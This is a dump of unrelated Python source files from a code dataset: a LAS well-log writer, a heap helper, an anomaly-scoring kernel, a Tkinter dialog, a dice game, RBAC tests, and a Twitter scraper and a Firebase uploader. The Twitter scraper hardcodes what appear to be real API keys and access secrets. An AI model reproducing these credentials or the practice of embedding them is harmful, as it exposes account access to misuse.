prediction)\n","sub_path":"multi-modal/voting.py","file_name":"voting.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"254225808","text":"import datetime\nimport json\nimport os\nimport time\n\nimport pandas as pd\n\nfrom configs import (\n PATHS,\n TIME_BETWEEN_SCRAPES,\n TIME_BETWEEN_RETRIES,\n)\nfrom utils.scrape_utils import get_paths, print_updates, read_n_people\n\nDATA_PATH = get_paths(PATHS)\n\n\ndef main():\n\n credentials_path = os.path.join(DATA_PATH, \"puregym_credentials.json\")\n\n with open(credentials_path, \"r\") as read_file:\n credentials = json.load(read_file)\n\n people_counts = pd.Series()\n\n file_path = os.path.join(\n os.path.join(DATA_PATH, \"data_n_people\"),\n datetime.datetime.now().strftime(\n \"gym_people_counts_run_starting_%Y_%m_%d__%H_%M.csv\"\n ),\n )\n\n errors_this_run = 0\n start_time = time.time()\n\n while True:\n try:\n people_counts = read_n_people(people_counts, credentials, file_path)\n print_updates(start_time, errors_this_run)\n time.sleep(TIME_BETWEEN_SCRAPES)\n except Exception as e:\n errors_this_run += 1\n print(e)\n print_updates(start_time, errors_this_run)\n time.sleep(TIME_BETWEEN_RETRIES)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scrape_n_people_in_gym.py","file_name":"scrape_n_people_in_gym.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"565644566","text":"import logging\nimport textwrap\n\nimport numpy as np\n\nfrom .las_items import (\n HeaderItem, CurveItem, SectionItems, OrderedDict)\nfrom . import defaults\nfrom . 
import exceptions\n\nlogger = logging.getLogger(__name__)\n\n\ndef write(las, file_object, version=None, wrap=None, STRT=None,\n STOP=None, STEP=None, fmt='%10.5g'):\n if wrap is None:\n wrap = las.version['WRAP'] == 'YES'\n elif wrap is True:\n las.version['WRAP'] = HeaderItem(\n 'WRAP', '', 'YES', 'Multiple lines per depth step')\n elif wrap is False:\n las.version['WRAP'] = HeaderItem(\n 'WRAP', '', 'NO', 'One line per depth step')\n lines = []\n\n assert version in (1.2, 2, None)\n if version is None:\n version = las.version['VERS'].value\n if version == 1.2:\n las.version['VERS'] = HeaderItem(\n 'VERS', '', 1.2, 'CWLS LOG ASCII STANDARD - VERSION 1.2')\n elif version == 2:\n las.version['VERS'] = HeaderItem(\n 'VERS', '', 2.0, 'CWLS log ASCII Standard -VERSION 2.0')\n\n if STRT is None:\n STRT = las.index[0]\n if STOP is None:\n STOP = las.index[-1]\n if STEP is None:\n STEP = las.index[1] - las.index[0] # Faster than np.gradient\n las.well['STRT'].value = STRT\n las.well['STOP'].value = STOP\n las.well['STEP'].value = STEP\n\n # Check units\n if las.curves[0].unit:\n unit = las.curves[0].unit\n else:\n unit = las.well['STRT'].unit\n las.well['STRT'].unit = unit\n las.well['STOP'].unit = unit\n las.well['STEP'].unit = unit\n las.curves[0].unit = unit\n\n # Check for any changes in the pandas dataframe and if there are,\n # create new curves so they are reflected in the output LAS file.\n\n # if las.use_pandas:\n # curve_names = lambda: [ci.mnemonic for ci in las.curves]\n # for df_curve_name in list(las.df.columns.values):\n # if not df_curve_name in curve_names():\n # las.add_curve(df_curve_name, las.df[df_curve_name])\n\n # Write each section.\n\n # ~Version\n logger.debug('LASFile.write Version section')\n lines.append('~Version '.ljust(60, '-'))\n order_func = get_section_order_function('Version', version)\n section_widths = get_section_widths(\n 'Version', las.version, version, order_func)\n for header_item in las.version.values():\n mnemonic = header_item.original_mnemonic\n # logger.debug('LASFile.write ' + str(header_item))\n order = order_func(mnemonic)\n # logger.debug('LASFile.write order = %s' % (order, ))\n logger.debug('LASFile.write %s\\norder=%s section_widths=%s' % (\n header_item, order, section_widths))\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Well\n logger.debug('LASFile.write Well section')\n lines.append('~Well '.ljust(60, '-'))\n order_func = get_section_order_function('Well', version)\n section_widths = get_section_widths(\n 'Well', las.well, version, order_func)\n # logger.debug('LASFile.write well section_widths=%s' % section_widths)\n for header_item in las.well.values():\n mnemonic = header_item.original_mnemonic\n order = order_func(mnemonic)\n logger.debug('LASFile.write %s\\norder=%s section_widths=%s' % (\n header_item, order, section_widths))\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Curves\n logger.debug('LASFile.write Curves section')\n lines.append('~Curves '.ljust(60, '-'))\n order_func = get_section_order_function('Curves', version)\n section_widths = get_section_widths(\n 'Curves', las.curves, version, order_func)\n for header_item in las.curves:\n mnemonic = header_item.original_mnemonic\n order = order_func(mnemonic)\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Params\n 
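# each header line renders via the formatter as '<mnemonic>.<unit><padded middle> : <rhs>' (the '%s.%s : %s' template above), with value/descr order chosen per mnemonic and LAS version\n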
lines.append('~Params '.ljust(60, '-'))\n order_func = get_section_order_function('Parameter', version)\n section_widths = get_section_widths(\n 'Parameter', las.params, version, order_func)\n for header_item in las.params.values():\n mnemonic = header_item.original_mnemonic\n order = order_func(mnemonic)\n formatter_func = get_formatter_function(order, **section_widths)\n line = formatter_func(header_item)\n lines.append(line)\n\n # ~Other\n lines.append('~Other '.ljust(60, '-'))\n lines += las.other.splitlines()\n\n lines.append('~ASCII '.ljust(60, '-'))\n\n file_object.write('\\n'.join(lines))\n file_object.write('\\n')\n\n # data_arr = np.column_stack([c.data for c in las.curves])\n data_arr = las.data\n nrows, ncols = data_arr.shape\n\n def format_data_section_line(n, fmt, l=10, spacer=' '):\n try:\n if np.isnan(n):\n return spacer + str(las.well['NULL'].value).rjust(l)\n else:\n return spacer + (fmt % n).rjust(l)\n except TypeError:\n return spacer + str(n).rjust(l)\n\n twrapper = textwrap.TextWrapper(width=79)\n for i in range(nrows):\n depth_slice = ''\n for j in range(ncols):\n depth_slice += format_data_section_line(data_arr[i, j], fmt)\n\n if wrap:\n lines = twrapper.wrap(depth_slice)\n logger.debug('LASFile.write Wrapped %d lines out of %s' %\n (len(lines), depth_slice))\n else:\n lines = [depth_slice]\n\n if las.version['VERS'].value == 1.2:\n for line in lines:\n if len(line) > 255:\n logger.warning(\n 'LASFile.write Data line > 256 chars: %s' % line)\n\n for line in lines:\n file_object.write(line + '\\n')\n\n\ndef get_formatter_function(order, left_width=None, middle_width=None):\n '''Create function to format a LAS header item.\n\n Arguments:\n order: format of item, either 'descr:value' or 'value:descr' -- see\n LAS 1.2 and 2.0 specifications for more information.\n\n Keyword Arguments:\n left_width (int): number of characters to the left hand side of the\n first period\n middle_width (int): total number of characters minus 1 between the\n first period from the left and the first colon from the left.\n\n Returns:\n A function which takes a header item (e.g. 
LASHeaderItem or Curve)\n as its single argument and which in turn returns a string which is\n the correctly formatted LAS header line.\n\n '''\n if left_width is None:\n left_width = 10\n if middle_width is None:\n middle_width = 40\n mnemonic_func = lambda mnemonic: mnemonic.ljust(left_width)\n middle_func = lambda unit, right_hand_item: (\n unit\n + ' ' * (middle_width - len(str(unit)) - len(right_hand_item))\n + right_hand_item\n )\n if order == 'descr:value':\n return lambda item: '%s.%s : %s' % (\n mnemonic_func(item.original_mnemonic),\n middle_func(str(item.unit), str(item.descr)),\n item.value\n )\n elif order == 'value:descr':\n return lambda item: '%s.%s : %s' % (\n mnemonic_func(item.original_mnemonic),\n middle_func(str(item.unit), str(item.value)),\n item.descr\n )\n\n\ndef get_section_order_function(section, version,\n order_definitions=defaults.ORDER_DEFINITIONS):\n '''Get a function that returns the order per mnemonic and section.\n\n Arguments:\n section (str): either 'well', 'params', 'curves', 'version'\n version (float): either 1.2 and 2.0\n\n Keyword Arguments:\n order_definitions (dict): ...\n\n Returns:\n A function which takes a mnemonic (str) as its only argument, and \n in turn returns the order 'value:descr' or 'descr:value'.\n\n '''\n section_orders = order_definitions[version][section]\n default_order = section_orders[0]\n orders = {}\n for order, mnemonics in section_orders[1:]:\n for mnemonic in mnemonics:\n orders[mnemonic] = order\n return lambda mnemonic: orders.get(mnemonic, default_order)\n\n\ndef get_section_widths(section_name, items, version, order_func,\n middle_padding=5):\n '''Find minimum section widths fitting the content in *items*.\n\n Arguments:\n section_name (str): either 'version', 'well', 'curves', or 'params'\n items (SectionItems): section items\n version (float): either 1.2 or 2.0\n\n '''\n section_widths = {\n 'left_width': None,\n 'middle_width': None\n }\n if len(items) > 0:\n section_widths['left_width'] = max(\n [len(i.original_mnemonic) for i in items])\n middle_widths = []\n for i in items:\n order = order_func(i.mnemonic)\n rhs_element = order.split(':')[0]\n logger.debug(\n 'get_section_widths %s\\n\\torder=%s rhs_element=%s' % (\n i, order, rhs_element))\n middle_widths.append(\n len(str(i.unit)) + 1 + len(str(i[rhs_element])))\n section_widths['middle_width'] = max(middle_widths)\n return section_widths\n","sub_path":"lasio/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":9365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"437915893","text":"from heapq import heapify, heappush, heappop\n\n\ndef nsmallest(m):\n n = len(m)\n h = [(m[i][0][0], i, 0, 0) for i in xrange(n)]\n heapify(h)\n results = []\n s = set()\n while True:\n val, i, j, k = heappop(h)\n results.append(val)\n if len(results) == n:\n return results\n else:\n if j+1 < n and (i, j+1, k) not in s:\n s.add((i, j+1, k))\n heappush(h, (m[i][j+1][k], i, j+1, k))\n if k+1 < n and (i, j, k+1) not in s:\n s.add((i, j, k+1))\n heappush(h, (m[i][j][k+1], i, j, k+1))\n","sub_path":"heaps/n_smallest_matrix.py","file_name":"n_smallest_matrix.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"385841034","text":"import numpy as np\r\nimport random\r\n\r\n\r\ndef IDK(X, t, psi):\r\n # # distance between every two points\r\n # distance_matrix = np.zeros((X.shape[0], X.shape[0]))\r\n # feature map of D\r\n 
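# feature-map layout: one slot per (partition, hypersphere) pair; a point caught by sphere j of partition 'time' sets slot time*psi + j\r\n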
featuremap_count = np.zeros(t * psi)\r\n # onepoint_matrix[i] records which positions of the t*psi-dim vector point i maps to; onepoint_matrix[i][j]: area number of the i-th point in the j-th partition\r\n # an initial value of -1 means the point maps to the all-zero vector in the 'time'-th partition\r\n onepoint_matrix = np.full((X.shape[0], t), -1)\r\n pre_scores = np.zeros(X.shape[0])\r\n # for i in range(X.shape[0]):\r\n # for j in range(X.shape[0]):\r\n # if i < j:\r\n # distance_matrix[i][j] = np.linalg.norm(X[i] - X[j])\r\n # else:\r\n # distance_matrix[i][j] = distance_matrix[j][i]\r\n for time in range(t):\r\n sample_num = psi #\r\n sample_list = [p for p in range(X.shape[0])] # [0, 1, 2, 3]\r\n sample_list = random.sample(sample_list, sample_num) # [1, 2]\r\n sample = X[sample_list, :] # array([[ 4, 5, 6, 7], [ 8, 9, 10, 11]])\r\n # distance between sample\r\n tem = np.dot(np.square(sample), np.ones(sample.T.shape))\r\n sample2sample = tem + tem.T - 2 * np.dot(sample, sample.T)\r\n\r\n # for i in range(len(sample_list)):\r\n # for j in range(len(sample_list)):\r\n # if i != j:\r\n # if radius_list[i] == 0:\r\n # radius_list[i] = distance_matrix[sample_list[i]][sample_list[j]]\r\n #\r\n # elif radius_list[i] > distance_matrix[sample_list[i]][sample_list[j]]:\r\n # radius_list[i] = distance_matrix[sample_list[i]][sample_list[j]]\r\n sample2sample[sample2sample < 1e-9] = 99999999\r\n radius_list = np.min(sample2sample, axis=1) # the minimum of each row forms a row vector\r\n\r\n tem1 = np.dot(np.square(X), np.ones(sample.T.shape)) # n*psi\r\n tem2 = np.dot(np.ones(X.shape), np.square(sample.T))\r\n point2sample = tem1 + tem2 - 2 * np.dot(X, sample.T) # n*psi\r\n min_dist_point2sample = np.argmin(point2sample, axis=1) # index\r\n # min_dist_point2sample_val = np.argmin(point2sample, axis=1)\r\n\r\n # map all points\r\n # for i in range(X.shape[0]):\r\n # for j in range(len(sample_list)):\r\n # if distance_matrix[i][sample_list[j]] < radius_list[j]:\r\n # if onepoint_matrix[i][time] == -1:\r\n # onepoint_matrix[i][time] = j + time * psi\r\n # elif distance_matrix[i][sample_list[j]] < distance_matrix[i][\r\n # sample_list[onepoint_matrix[i][time] - time * psi]]:\r\n # onepoint_matrix[i][time] = j + time * psi\r\n # if onepoint_matrix[i][time] != -1:\r\n # featuremap_count[onepoint_matrix[i][time]] += 1\r\n for i in range(X.shape[0]):\r\n if point2sample[i][min_dist_point2sample[i]] < radius_list[min_dist_point2sample[i]]:\r\n onepoint_matrix[i][time] = min_dist_point2sample[i] + time * psi\r\n featuremap_count[onepoint_matrix[i][time]] += 1\r\n\r\n # feature map of D\r\n featuremap_count /= X.shape[0]\r\n # cal feature map of every point\r\n count_list = np.zeros(X.shape[0])\r\n for i in range(onepoint_matrix.shape[0]):\r\n for ele in onepoint_matrix[i]:\r\n if ele != -1:\r\n pre_scores[i] += featuremap_count[ele]\r\n count_list[i] += 1\r\n #return pre_scores/np.sqrt(count_list)/np.sqrt(np.dot(featuremap_count.T,featuremap_count))\r\n return pre_scores / np.sqrt(t) / np.sqrt(np.dot(featuremap_count.T, featuremap_count))\r\n #return pre_scores/t\r\n","sub_path":"IDK.py","file_name":"IDK.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"342022796","text":"'''\nCreated on 27.04.2013\n\n@author: user\n'''\n\nimport os, copy\nfrom Tkinter import Tk, Menu, Frame, Text, Scrollbar, Toplevel\nfrom Tkconstants import N, E, S, W, HORIZONTAL, VERTICAL\nfrom ttk import Treeview\nimport tkFileDialog\n\nfrom lib.books.tableofcontents import parse_toc_text\nfrom lib.pytools import encodings\n\nclass TOCImportDialog(Toplevel): \n \n
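# modal dialog pairing a Treeview (parsed TOC tree, left) with a Text widget (raw TOC lines, right), plus File/Edit/Help menus\n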
def __init__(self, master, **args): \n '''\n init's TOCImportDialog\n \n @param args: delimiter1, delimiter2, encoding, linechar \n '''\n self.__master = master\n self.__config = {}\n self.__config[\"delimiter1\"] = args.pop(\"delimiter1\", \" \")\n self.__config[\"delimiter2\"] = args.pop(\"delimiter2\", \" \")\n self.__config[\"encoding\"] = args.pop(\"encoding\", \"UTF-8\")\n self.__config[\"linechar\"] = args.pop(\"linechar\", \".\")\n \n self.__orglines = []\n self.__toc = []\n \n if args.has_key(\"filename\"):\n if os.access(args[\"filename\"], os.F_OK & os.R_OK):\n f = open(args[\"filename\"])\n self.__orglines = f.readlines()\n f.close()\n \n self.init_tk()\n \n \n def init_tk(self):\n Toplevel.__init__(self, self.__master)\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n \n self.init_menu()\n \n tvframe = Frame(self)\n tvframe.grid(column=0, row=0, sticky=N+E+S+W)\n tvframe.columnconfigure(0, weight=1)\n tvframe.rowconfigure(0, weight=1)\n \n self.Treeview = Treeview(tvframe)\n self.Treeview.grid(column=0, row=0, sticky=N+E+S+W)\n self.TvYScrollbar = Scrollbar(tvframe, orient=VERTICAL, command=self.Treeview.yview)\n self.TvYScrollbar.grid(column=1, row=0, sticky=N+S)\n self.TvXScrollbar = Scrollbar(tvframe, orient=HORIZONTAL, command=self.Treeview.xview)\n self.TvXScrollbar.grid(column=0, row=1, sticky=E+W)\n self.Treeview.config(yscrollcommand=self.TvYScrollbar.set)\n self.Treeview.config(xscrollcommand=self.TvXScrollbar.set)\n \n self.Treeview.bind(\"<>\", self.action_tv_select)\n \n txtframe = Frame(self)\n txtframe.grid(column=1, row=0, sticky=N+E+S+W)\n txtframe.columnconfigure(0, weight=1)\n txtframe.rowconfigure(0, weight=1)\n \n self.Text = Text(txtframe)\n self.Text.grid(column=0, row=0, sticky=N+E+S+W)\n self.TxtYScrollbar = Scrollbar(txtframe, orient=VERTICAL, command=self.Text.yview)\n self.TxtYScrollbar.grid(column=1, row=0, sticky=N+S)\n self.TxtXScrollbar = Scrollbar(txtframe, orient=HORIZONTAL, command=self.Text.xview)\n self.TxtXScrollbar.grid(column=0, row=1, sticky=E+W)\n self.Text.config(yscrollcommand=self.TxtYScrollbar.set)\n self.Text.config(xscrollcommand=self.TxtXScrollbar.set)\n \n tvcmdframe = Frame(self)\n tvcmdframe.grid(column=0, row=1)\n \n txtcmdframe = Frame(self)\n txtcmdframe.grid(column=1, row=1)\n \n \n def init_menu(self):\n menubar = Menu(self)\n #file menu\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"New\", command=self.action_filemenu_new)\n filemenu.add_command(label=\"Open\", command=self.action_filemenu_open)\n filemenu.add_command(label=\"Save\", command=self.action_filemenu_save)\n filemenu.add_command(label=\"Save as\", command=self.action_filemenu_saveas)\n filemenu.add_separator()\n filemenu.add_command(label=\"Cancel\", command=self.action_filemenu_cancel)\n filemenu.add_command(label=\"Return\", command=self.action_filemenu_return)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n #edit menu\n editmenu = Menu(menubar, tearoff=0)\n editmenu.add_command(label=\"Update Tree\", command=self.action_editmenu_update)\n editmenu.add_command(label=\"Reset Text\", command=self.action_editmenu_reset)\n editmenu.add_separator()\n editmenu.add_command(label=\"Setup\", command=self.action_editmenu_setup)\n menubar.add_cascade(label=\"Edit\", menu=editmenu)\n #help menu\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.action_helpmenu_about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n #self.TreeFont=\n self.config(menu=menubar)\n \n \n def 
action_tv_select(self, event):\n s = self.Treeview.selection()\n self.__selection = int(s[0])\n \n def action_filemenu_new(self):\n pass\n \n \n def action_filemenu_open(self):\n #open dialog\n s_filename = tkFileDialog.askopenfilename(filetypes=[(\"text file\",\"*.txt\"),(\"all files\",\"*.*\")], title=\"open a file\")\n #if dialog was canceled\n if s_filename == \"\":\n return\n f = open(s_filename)\n self.__orglines = f.readlines()\n f.close()\n self.reset_lines()\n \n def action_filemenu_save(self):\n pass\n \n \n def action_filemenu_saveas(self):\n pass\n \n \n def action_filemenu_cancel(self):\n self.__toc = []\n self.quit_application()\n \n \n def action_filemenu_return(self):\n self.quit_application()\n\n \n def action_editmenu_update(self):\n self.update_treeview(self.Text.get(\"1.0\", \"end\"))\n \n \n def action_editmenu_reset(self):\n self.reset_lines()\n \n \n def action_editmenu_setup(self):\n pass\n \n \n def action_helpmenu_about(self):\n pass\n \n \n def run_application(self):\n self.reset_lines()\n self.mainloop()\n \n def quit_application(self):\n self.destroy()\n \n def get_toc(self):\n return copy.deepcopy(self.__toc)\n \n def reset_lines(self):\n self.Text.delete(\"1.0\", \"end\")\n for line in self.__orglines:\n self.Text.insert(\"end\", line)\n \n \n def update_treeview(self, s_text):\n \n self.__toc = parse_toc_text(s_text, **self.__config)\n \n self.Treeview.delete(*self.Treeview.get_children())\n \n for row in self.__toc:\n #encodings.print_encoded(u\"%s > %s\" % (row[\"chapter_number\"], row[\"chapter_name\"]))\n s_chpnum = row[\"chapter_number\"].encode(self.__config[\"encoding\"])\n s_chpname = row[\"chapter_name\"].encode(self.__config[\"encoding\"])\n self.Treeview.insert(\"\", \"end\", iid=row[\"rid\"], text=str(\"%s > %s\" % (s_chpnum, s_chpname)) )\n \n for row in self.__toc:\n self.Treeview.set_children(row[\"rid\"], *row[\"clds\"])\n \n\ndef test():\n app = Tk()\n dlg = TOCImportDialog(app, filename=\"TOCImportDialog_test.txt\")\n app.wait_window(dlg)\n res = dlg.get_toc()\n app.quit()\n print(res)\n \n \nif __name__ == '__main__':\n test()","sub_path":"plx/lib/tkwidgets/TOCImportDialog.py","file_name":"TOCImportDialog.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"158433442","text":"# -*- coding: UTF-8 -*-\n\nfrom unittest import TestCase, TestProgram\n\nfrom junit import junit_main\nfrom os.path import devnull\nfrom platform import uname\n\nclass T(TestCase):\n def test(self):\n expected = expected_by_os(),\n got = tuple(junit_main('-b,,-l,'.split(','), simulate_bad_call=True))\n self.assertEquals(expected, got)\n\ndef expected_by_os():\n if devnull == '/dev/null':\n return '[Errno 13] Permission denied'\n u = uname()[0]\n if u == 'Windows':\n return u'[Error 2] 指定されたファイルが見つかりません。'\n raise Exception(u)\n\nif __name__ == '__main__':\n TestProgram()\n","sub_path":"last-dropbox/junit.py/test02junitmain.py","file_name":"test02junitmain.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"519620347","text":"import random\n\n\nclass Player:\n\n def __init__(self, max_rolls):\n self.max_rolls = max_rolls\n\n def roll(self):\n return random.randint(1, 6)\n\n def hold(self):\n return False\n\n\nclass Game:\n\n def __init__(self, player):\n self.player = player\n self.total_score = 0\n self.rounds = 7\n\n def round(self):\n round_total = 0\n roll_num = 0\n while 
roll_num < self.player.max_rolls:\n roll_num += 1\n roll = self.player.roll()\n if roll > 1:\n round_total += roll\n else:\n round_total = 0\n break\n print(round_total)\n return round_total\n\n def play_game(self):\n\n while self.rounds > 1:\n self.total_score += self.round()\n self.rounds -= 1\n\n print(self.total_score)\n return self.total_score\n\nplayer = Player(2)\ngame = Game(player)\ngame.play_game()\n","sub_path":"some_pig.py","file_name":"some_pig.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"458066991","text":"# Copyright (C) 2017 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Test Access Control List\"\"\"\n\nfrom ggrc import db\nfrom ggrc.models import all_models\nfrom integration.ggrc import TestCase\nfrom integration.ggrc.models import factories\nfrom integration.ggrc.api_helper import Api\nfrom integration.ggrc.generator import ObjectGenerator\n\n\nclass TestAccessControlRBAC(TestCase):\n \"\"\"TestAccessControlRBAC tests if users get correct permissions on objects\n from the access control table\"\"\"\n\n def setUp(self):\n super(TestAccessControlRBAC, self).setUp()\n self.api = Api()\n self.set_up_people()\n self.set_up_acl_object()\n\n def set_up_people(self):\n \"\"\"Set up people with different roles needed by the tests\"\"\"\n self.people = {}\n object_generator = ObjectGenerator()\n\n for name in [\"Creator\", \"Reader\", \"Editor\"]:\n _, user = object_generator.generate_person(\n data={\"name\": name}, user_role=name)\n self.people[name] = user\n\n def set_up_acl_object(self):\n \"\"\"Set up a control with an access control role that grants RUD\"\"\"\n self.control = factories.ControlFactory()\n self.all_acr = factories.AccessControlRoleFactory(\n object_type=\"Control\",\n read=True,\n update=True,\n delete=True\n )\n for name in [\"Creator\", \"Reader\", \"Editor\"]:\n factories.AccessControlListFactory(\n object=self.control,\n ac_role_id=self.all_acr.id,\n person=self.people.get(name)\n )\n\n def test_acl_object_cru(self):\n \"\"\"Test if readers/creators can CRUD an object with all permissions\"\"\"\n control_id = self.control.id\n # role_id = self.all_acr.id\n for name in (\"Creator\", \"Reader\", \"Editor\"):\n person = self.people.get(name)\n role_id = self.all_acr.id\n db.session.add(person)\n self.api.set_user(person)\n response = self.api.get(all_models.Control, control_id)\n assert response.status_code == 200, \\\n \"{} cannot GET object from acl. 
Received {}\".format(\n name, response.status)\n acl = response.json[\"control\"][\"access_control_list\"]\n assert len(response.json[\"control\"][\"access_control_list\"]) == 3, \\\n \"ACL in control does not include all people {}\".format(acl)\n\n assert acl[0].get(\"ac_role_id\", None) == role_id, \\\n \"ACL list does not include role id {}\".format(acl)\n","sub_path":"test/integration/ggrc/access_control/test_ac_rbac.py","file_name":"test_ac_rbac.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"407229836","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------------\n# get_tweets.py\n# Description: Streams Twitter's API to recover tweets\n# ---------------------------------------------------------------------------\n\nimport tweepy\nimport csv\n\nckey = 'ApZ6PJFWxmX3C3w35leJREmIV'\ncsecret = 'KxrmUH2fzEYtWDZ0o1HzZl8WekFr1T0hOzv3keXbv6D3u179DV'\natoken = '3401879230-ImZvLr7uPrBsvHDzAitsLuSzgda0ZfJ2l1WYBg0'\nasecret = 'VIVs8KTr2dikl9k8N7IMrcfB0sh07XdkWP132eB1Jg4SU'\n\nauth = tweepy.OAuthHandler(ckey, csecret)\nauth.set_access_token (atoken, asecret)\n\napi = tweepy.API(auth, wait_on_rate_limit=True,\n\t\t\t\t wait_on_rate_limit_notify=True)\n \nif (not api):\n print (\"Can't Authenticate\")\n sys.exit(-1)\n\n\n# this is what we're searching for\nsearchQuery = 'Bring Bernie Back' \nlatlongs = '38.9072,-77.0369,20000mi' # location of the tweets\nlanguage = 'en' # language of tweets\nsearchtype = 'recent' # type of tweet search, could be recent, popular, or mixed\nentitiesin = 'false' # include or not some entities such as videos, images, urls in the tweets\nmaxTweets = 10000 # Some arbitrary large number\ntweetsPerQry = 1000 # this is the max the API permits\nfName = 'bernie2016tweets.csv' # We'll store the tweets in a csv file.\n\n\n# If results from a specific ID onwards are reqd, set since_id to that ID.\n# else default to no lower limit, go as far back as API allows\nsinceId = None\n\n# If results only below a specific ID are, set max_id to that ID.\n# else default to no upper limit, start from the most recent tweet matching the search query.\n# Choose some arbitrary VERY large number if you don't have a limit for the max_id\nmax_id = 1080402812358389000\n\ntweetCount = 0\nprint(\"Downloading max {0} tweets\".format(maxTweets))\nwhile tweetCount < maxTweets:\n try:\n if (max_id <= 0):\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry, lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n since_id=sinceId, lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n else:\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1), lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1),\n since_id=sinceId, lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n if not new_tweets:\n print(\"No more tweets found\")\n break\n\n # Specify the output of csv \n writer = csv.writer(open(fName, 'a'))\n \n for tweet in new_tweets:\n tweetid = tweet.id\n tweettext = tweet.text.encode('ascii', 'ignore')\n tweettime = tweet.created_at\n userlocation = tweet.user.location.encode('ascii', 
'ignore')\n retweets = tweet.retweet_count\n line = [tweetid, tweettext, tweettime, userlocation, retweets]\n writer.writerow(line)\n \n tweetCount += len(new_tweets)\n print(\"Downloaded {0} tweets\".format(tweetCount))\n max_id = new_tweets[-1].id\n except tweepy.TweepError as e:\n # Just exit if any error\n print(\"some error : \" + str(e))\n break\n\nprint (\"Downloaded {0} tweets, Saved to {1}\".format(tweetCount, fName))\n\n","sub_path":"GetTweets.py","file_name":"GetTweets.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"342046972","text":"#DEPRECATED REMOVE.\nimport pyrebase\nfrom collections import defaultdict\nimport calendar\nimport time\n\nimport dfsapi\nimport iassorter\nimport fbread\nfrom match import Match\n\n'''\nReads the instructors and institutions from the firebase database\nin the most recent timestamp under the specified program.\nMatches instructors to institutions and stores the matches\nby creating a recent timestamp under the matches tab under the specified program.\n'''\ndef upload_matches(program:str):\n\tinstructors = fbread.read_instructors(program)\n\tinstitutions = fbread.read_institutions(program)\n\n\tif instructors == False:\n\t\treturn False\n\tif institutions == False:\n\t\treturn False\n\n\tresult = iassorter.sort(instructors, institutions)\n\n\ttimestamp = str(calendar.timegm(time.gmtime()))\n\tdb = dfsapi.get_db()\n\n\tkeys = db.child(program).child(\"matches\").shallow().get()\n\tif keys.val() != None:\n\t\tdb_length = len(keys.val())\n\t\tif db_length > 10:\n\t\t\toldest = min(keys.val())\n\t\t\tdb.child(program).child(\"matches\").child(oldest).remove()\n\t\t\tprint(\"Here\")\n\n\tjson_matches = defaultdict(list)\n\n\tfor school in result:\n\t\tfor match in result[school]:\n\t\t\tmatch_dict = match_to_dict(match)\n\t\t\tjson_matches[school].append(match_dict)\n\t\t\tdb.child(program).child(\"matches\").child(timestamp).child(school).child(match.teacher_name).set(match_dict)\n\t\t\tdb.child(program).child(\"matches\").child(timestamp).child(school).child(match.teacher_name).update({\"Locked\":False})\n\n\treturn json_matches\n\n'''\nConverts match objects into a dictionary with information\nof both the instructor and institution.\n'''\ndef match_to_dict(match : Match) -> dict:\n\tmatch_dict = {\"TeacherName\" : match.teacher_name,\n\t\t\"SchoolName\" : match.school_name,\n\t\t\"Region\" : match.region,\n\t\t\"PreviousMentor\" : match.previous_mentor,\n\t\t\"Car\" : match.car,\n\t\t\"Languages\" : match.languages,\n\t\t\"MultipleDays\" : match.multiple_days,\n\t\t\"Schedule\" : match.schedule,\n\t\t\"Locked\" : match.locked,\n\t\t\"Instructors\" : match.instructors,\n\t\t\"Gender\" : match.gender,\n\t\t\"University\" : match.university,\n\t\t\"Year\" : match.year,\n\t\t\"Ethnicity\" : match.ethnicity,\n\t\t\"SchoolAddress\" : match.school_address,\n\t\t\"SchoolCounty\" : match.school_county,\n\t\t\"TeacherSchedule\" : match.teacher_schedule,\n\t\t\"ShirtSize\" : match.shirtsize\n\t}\n\treturn 